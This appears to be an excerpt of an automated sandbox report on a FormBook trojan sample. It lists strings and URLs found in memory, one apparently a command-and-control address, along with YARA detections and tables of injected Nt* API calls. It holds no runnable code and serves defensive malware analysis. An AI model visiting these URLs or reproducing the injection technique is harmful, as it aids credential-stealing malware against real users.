              Source: chkntfs.exe, 0000000E.00000003.1612857015.0000000007945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: chkntfs.exe, 0000000E.00000002.3707027734.00000000062FA000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.000000000494A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cvt-auto.ru/1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chkntfs.exe, 0000000E.00000002.3709714748.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namesilo.com
              Source: chkntfs.exe, 0000000E.00000002.3709714748.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namesilo.com/domain/search-domains?query=ridcoredry.live
              Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0042B533 NtClose,3_2_0042B533
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2B60 NtClose,LdrInitializeThunk,3_2_012E2B60
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_012E2DF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_012E2C70
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E35C0 NtCreateMutant,LdrInitializeThunk,3_2_012E35C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E4340 NtSetContextThread,3_2_012E4340
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E4650 NtSuspendThread,3_2_012E4650
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2BA0 NtEnumerateValueKey,3_2_012E2BA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2B80 NtQueryInformationFile,3_2_012E2B80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2BE0 NtQueryValueKey,3_2_012E2BE0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2BF0 NtAllocateVirtualMemory,3_2_012E2BF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2AB0 NtWaitForSingleObject,3_2_012E2AB0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2AF0 NtWriteFile,3_2_012E2AF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2AD0 NtReadFile,3_2_012E2AD0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2D30 NtUnmapViewOfSection,3_2_012E2D30
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2D00 NtSetInformationFile,3_2_012E2D00
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2D10 NtMapViewOfSection,3_2_012E2D10
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2DB0 NtEnumerateKey,3_2_012E2DB0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2DD0 NtDelayExecution,3_2_012E2DD0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2C00 NtQueryInformationProcess,3_2_012E2C00
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2C60 NtCreateKey,3_2_012E2C60
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2CA0 NtQueryInformationToken,3_2_012E2CA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2CF0 NtOpenProcess,3_2_012E2CF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2CC0 NtQueryVirtualMemory,3_2_012E2CC0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2F30 NtCreateSection,3_2_012E2F30
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2F60 NtCreateProcessEx,3_2_012E2F60
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2FA0 NtQuerySection,3_2_012E2FA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2FB0 NtResumeThread,3_2_012E2FB0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2F90 NtProtectVirtualMemory,3_2_012E2F90
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2FE0 NtCreateFile,3_2_012E2FE0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2E30 NtWriteVirtualMemory,3_2_012E2E30
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2EA0 NtAdjustPrivilegesToken,3_2_012E2EA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2E80 NtReadVirtualMemory,3_2_012E2E80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2EE0 NtQueueApcThread,3_2_012E2EE0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E3010 NtOpenDirectoryObject,3_2_012E3010
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E3090 NtSetValueKey,3_2_012E3090
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E39B0 NtGetContextThread,3_2_012E39B0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E3D10 NtOpenProcessToken,3_2_012E3D10
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E3D70 NtOpenThread,3_2_012E3D70
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04814650 NtSuspendThread,LdrInitializeThunk,14_2_04814650
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04814340 NtSetContextThread,LdrInitializeThunk,14_2_04814340
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_04812CA0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812C60 NtCreateKey,LdrInitializeThunk,14_2_04812C60
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04812C70
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812DD0 NtDelayExecution,LdrInitializeThunk,14_2_04812DD0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_04812DF0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812D10 NtMapViewOfSection,LdrInitializeThunk,14_2_04812D10
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_04812D30
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812E80 NtReadVirtualMemory,LdrInitializeThunk,14_2_04812E80
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812EE0 NtQueueApcThread,LdrInitializeThunk,14_2_04812EE0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812FB0 NtResumeThread,LdrInitializeThunk,14_2_04812FB0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812FE0 NtCreateFile,LdrInitializeThunk,14_2_04812FE0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812F30 NtCreateSection,LdrInitializeThunk,14_2_04812F30
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812AD0 NtReadFile,LdrInitializeThunk,14_2_04812AD0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812AF0 NtWriteFile,LdrInitializeThunk,14_2_04812AF0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812BA0 NtEnumerateValueKey,LdrInitializeThunk,14_2_04812BA0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812BE0 NtQueryValueKey,LdrInitializeThunk,14_2_04812BE0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04812BF0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812B60 NtClose,LdrInitializeThunk,14_2_04812B60
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048135C0 NtCreateMutant,LdrInitializeThunk,14_2_048135C0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048139B0 NtGetContextThread,LdrInitializeThunk,14_2_048139B0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812CC0 NtQueryVirtualMemory,14_2_04812CC0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812CF0 NtOpenProcess,14_2_04812CF0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812C00 NtQueryInformationProcess,14_2_04812C00
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812DB0 NtEnumerateKey,14_2_04812DB0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812D00 NtSetInformationFile,14_2_04812D00
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812EA0 NtAdjustPrivilegesToken,14_2_04812EA0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812E30 NtWriteVirtualMemory,14_2_04812E30
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812F90 NtProtectVirtualMemory,14_2_04812F90
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812FA0 NtQuerySection,14_2_04812FA0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812F60 NtCreateProcessEx,14_2_04812F60
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812AB0 NtWaitForSingleObject,14_2_04812AB0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04812B80 NtQueryInformationFile,14_2_04812B80
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04813090 NtSetValueKey,14_2_04813090
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04813010 NtOpenDirectoryObject,14_2_04813010
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04813D10 NtOpenProcessToken,14_2_04813D10
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04813D70 NtOpenThread,14_2_04813D70
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005B8120 NtAllocateVirtualMemory,14_2_005B8120
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005B7CF0 NtCreateFile,14_2_005B7CF0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005B7E50 NtReadFile,14_2_005B7E50
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005B7F30 NtDeleteFile,14_2_005B7F30
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005B7FC0 NtClose,14_2_005B7FC0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 0_2_026E40780_2_026E4078
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 0_2_026E00400_2_026E0040
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 0_2_026E60400_2_026E6040
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 0_2_026E001E0_2_026E001E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004100DB3_2_004100DB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004100E33_2_004100E3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004011403_2_00401140
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004029103_2_00402910
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0040113E3_2_0040113E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0042D9833_2_0042D983
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00416A633_2_00416A63
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004032B73_2_004032B7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004033003_2_00403300
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004103033_2_00410303
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0040E3833_2_0040E383
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0040E4C83_2_0040E4C8
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004024F03_2_004024F0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0040E55C3_2_0040E55C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004026803_2_00402680
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A01003_2_012A0100
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134A1183_2_0134A118
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013381583_2_01338158
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013641A23_2_013641A2
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013701AA3_2_013701AA
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013681CC3_2_013681CC
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013420003_2_01342000
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136A3523_2_0136A352
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013703E63_2_013703E6
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE3F03_2_012BE3F0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013502743_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013302C03_2_013302C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B05353_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013705913_2_01370591
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013544203_2_01354420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013624463_2_01362446
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135E4F63_2_0135E4F6
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B07703_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D47503_2_012D4750
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AC7C03_2_012AC7C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CC6E03_2_012CC6E0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C69623_2_012C6962
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A03_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0137A9A63_2_0137A9A6
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BA8403_2_012BA840
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B28403_2_012B2840
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012968B83_2_012968B8
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE8F03_2_012DE8F0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136AB403_2_0136AB40
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01366BD73_2_01366BD7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AEA803_2_012AEA80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BAD003_2_012BAD00
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134CD1F3_2_0134CD1F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C8DBF3_2_012C8DBF
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AADE03_2_012AADE0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0C003_2_012B0C00
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350CB53_2_01350CB5
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A0CF23_2_012A0CF2
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01352F303_2_01352F30
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012F2F283_2_012F2F28
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D0F303_2_012D0F30
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01324F403_2_01324F40
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132EFA03_2_0132EFA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BCFE03_2_012BCFE0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A2FC83_2_012A2FC8
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136EE263_2_0136EE26
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0E593_2_012B0E59
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136CE933_2_0136CE93
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C2E903_2_012C2E90
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136EEDB3_2_0136EEDB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E516C3_2_012E516C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129F1723_2_0129F172
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0137B16B3_2_0137B16B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BB1B03_2_012BB1B0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136F0E03_2_0136F0E0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013670E93_2_013670E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B70C03_2_012B70C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135F0CC3_2_0135F0CC
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136132D3_2_0136132D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129D34C3_2_0129D34C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012F739A3_2_012F739A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B52A03_2_012B52A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013512ED3_2_013512ED
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CB2C03_2_012CB2C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013675713_2_01367571
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134D5B03_2_0134D5B0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013795C33_2_013795C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136F43F3_2_0136F43F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A14603_2_012A1460
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136F7B03_2_0136F7B0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012F56303_2_012F5630
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013616CC3_2_013616CC
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013459103_2_01345910
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B99503_2_012B9950
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CB9503_2_012CB950
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131D8003_2_0131D800
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B38E03_2_012B38E0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136FB763_2_0136FB76
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CFB803_2_012CFB80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01325BF03_2_01325BF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012EDBF93_2_012EDBF9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01323A6C3_2_01323A6C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01367A463_2_01367A46
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136FA493_2_0136FA49
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012F5AA03_2_012F5AA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01351AA33_2_01351AA3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134DAAC3_2_0134DAAC
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135DAC63_2_0135DAC6
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01367D733_2_01367D73
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B3D403_2_012B3D40
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01361D5A3_2_01361D5A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CFDC03_2_012CFDC0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01329C323_2_01329C32
